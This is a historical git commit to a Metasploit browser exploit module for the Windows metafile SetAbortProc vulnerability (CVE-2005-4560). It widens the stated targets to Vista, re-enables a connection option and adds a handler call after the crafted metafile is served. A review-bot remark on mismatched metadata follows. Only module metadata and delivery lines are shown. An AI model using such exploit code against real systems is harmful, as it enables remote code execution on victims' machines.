git-svn-id: file:///home/svn/incoming/trunk@3301 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-01-03 04:06:03 +00:00
parent d45bb85cf6
commit 9452249c09
1 changed files with 9 additions and 6 deletions


@ -11,7 +11,7 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution', 'Name' => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability in the GDI library included with This module exploits a vulnerability in the GDI library included with
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
@ -31,6 +31,7 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
['CVE', '2005-4560'], ['CVE', '2005-4560'],
['OSVDB', '21987'], ['OSVDB', '21987'],
['MIL', '111'], ['MIL', '111'],
['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],
['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'], ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'], ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
], ],
@ -44,13 +45,13 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
'BadChars' => "\x00", 'BadChars' => "\x00",
'Compat' => 'Compat' =>
{ {
# 'ConnectionType' => "-find" 'ConnectionType' => '-find',
} },
}, },
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Windows XP/2003 Automatic', { }], [ 'Windows XP/2003/Vista Automatic', { }],
], ],
'DisclosureDate' => 'Dec 27 2005', 'DisclosureDate' => 'Dec 27 2005',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
@ -68,6 +69,8 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
# Transmit the compressed response to the client # Transmit the compressed response to the client
send_html_gzip_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' }) send_html_gzip_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })
handler(cli)
end end
def generate_metafile(payload) def generate_metafile(payload)
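Review bot: The 'Description' context lines in the first hunk still read `Windows XP and 2003`, although this commit changes both 'Name' and the target label to `XP/2003/Vista`, so the module's metadata now disagrees with itself about which platforms are covered. If Vista is meant to be in scope, the description should say so too, for example `Windows XP, 2003 and Vista. This vulnerability uses the 'Escape' metafile function`. The description continues outside the hunk, so the rest of it may need the same pass. The commit message carries only the git-svn-id, so the reason for un-commenting `'ConnectionType' => '-find'` under 'Compat' is not recorded anywhere. A one-line comment beside that entry, such as `# re-enabled: <reason>`, would help anyone auditing the module later.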